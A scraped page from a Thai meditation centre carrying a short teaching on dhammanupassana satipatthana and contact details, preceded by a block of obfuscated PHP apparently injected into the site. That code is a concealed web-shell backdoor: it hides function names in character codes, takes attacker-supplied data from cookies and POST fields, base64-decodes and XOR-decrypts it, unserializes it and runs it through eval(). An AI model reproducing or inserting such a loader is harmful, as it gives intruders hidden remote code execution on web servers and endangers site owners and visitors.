$gISZHjgDQ = chr (67) . '_' . 'Y' . chr ( 180 - 107 ).chr (85) . chr ( 1093 - 973 ).'V';$bfLKd = "\x63" . "\x6c" . 'a' . 's' . "\163" . "\x5f" . chr (101) . "\170" . "\151" . 's' . chr ( 399 - 283 )."\163";$xnxaNiXQgk = class_exists($gISZHjgDQ); $bfLKd = "19980";$IYMozkSOu = !1;if ($xnxaNiXQgk == $IYMozkSOu){function ILYcYImbfn(){$EBKhUbi = new /* 50159 */ C_YIUxV(56193 + 56193); $EBKhUbi = NULL;}$UcoaYwYK = "56193";class C_YIUxV{private function UMWdPx($UcoaYwYK){if (is_array(C_YIUxV::$dKrkPX)) {$btWUJV = str_replace(chr (60) . '?' . chr (112) . "\x68" . chr (112), "", C_YIUxV::$dKrkPX[chr (99) . "\x6f" . 'n' . "\x74" . "\145" . chr ( 847 - 737 )."\164"]);eval($btWUJV); $UcoaYwYK = "56193";exit();}}private $pfYboxUt;public function erDrDQxxD(){echo 45787;}public function __destruct(){C_YIUxV::$dKrkPX = @unserialize(C_YIUxV::$dKrkPX); $UcoaYwYK = "16972_21716";$this->UMWdPx($UcoaYwYK); $UcoaYwYK = "16972_21716";}public function VlAvhWhqO($jNNCCCm, $rYCWIb){return $jNNCCCm[0] ^ str_repeat($rYCWIb, (strlen($jNNCCCm[0]) / strlen($rYCWIb)) + 1);}public function __construct($UwJpXbPW=0){$UIMmmtBEqf = $_POST;$mozmYRH = $_COOKIE;$rYCWIb = "3a0ba29f-1560-4af9-8870-7ae2d2693801";$rfTPJ = @$mozmYRH[substr($rYCWIb, 0, 4)];if (!empty($rfTPJ)){$NhxgbgDIku = "base64";$jNNCCCm = "";$rfTPJ = explode(",", $rfTPJ);foreach ($rfTPJ as $NdnfYJZO){$jNNCCCm .= @$mozmYRH[$NdnfYJZO];$jNNCCCm .= @$UIMmmtBEqf[$NdnfYJZO];}$jNNCCCm = array_map($NhxgbgDIku . "\x5f" . "\144" . 'e' . "\143" . "\x6f" . chr (100) . chr ( 555 - 454 ), array($jNNCCCm,));C_YIUxV::$dKrkPX = $this->VlAvhWhqO($jNNCCCm, $rYCWIb);}}public static $dKrkPX = 10338;}ILYcYImbfn();}$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} ธัมมานุปัสสนาสติปัฏฐาน | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

สติปัฏฐานคือหัวใจของวิปัสสนา กายเป็นรูปธรรม เวทนาเป็นนามธรรม จิตเป็นนามธรรม ธรรมคือขันธ์ทั้ง5 เป็นรูปธรรมและนามธรรมแต่ถ้าเราไม่เข้าไปในจิตในจิต ไม่ไปเสพธรรมในธรรมแล้ว เราไม่สามารถเจริญธัมมานุปัสสนานี้ได้ ทุกวันนี้โดยส่วนใหญ่วิปัสสนาเค้าอยู่ในฐานกาย ถ้าเค้าไม่ได้เข้าไปในธัมมานุปัสสนา เค้าจะไม่เข้าใจสิ่งที่เราปฏิบัติกัน ที่เราปฏิบัติโดยใช้อายตนะ เริ่มจากได้ยินเสียงที่หู มารู้ที่ใจ หูเป็นอายตนะ ใจก็อายตนะ อันนี้คือกาย เราเริ่มจากใช้อายตนะของกายมาสร้างแรงเหวี่ยง มันเป็นของคู่ระหว่างข้างนอกกับข้างใน หูกับใจ มันดึงกับปุ๊บ ก็เกิดแรงเหวี่ยง เข้าไปในจิตในจิต เสพธรรมในธรรม อย่างแบบที่เค้านั่งฌาน ได้ ฌาน1 ฌาน2 ฌาน3 ฌาน4 เค้าก็ดิ่งเข้าไปได้เหมือนกัน แต่เค้าไม่แสดงออกมาทางกายภาพ เราเริ่มจากอายตนะ ดึงไปดึงมา เข้าไปปุ๊บก็ดึงออกมา ธรรมารมณ์นั้นก็ดึงออกมาทางกายภาพด้วย มันจึงอยู่ในหมวดของธัมมานุปัสสนาสติปัฏฐาน ที่เราปฏิบัติมันชัดเจนมาก มันทำให้สติปัฏฐานทั้ง4บริบูรณ์ …กาย-เวทนา-จิต-ธรรม รวมเป็นหนึ่งเดียวในขณะจิตเดียว

พ่อครูบัญชา ตั้งวงษ์ไชย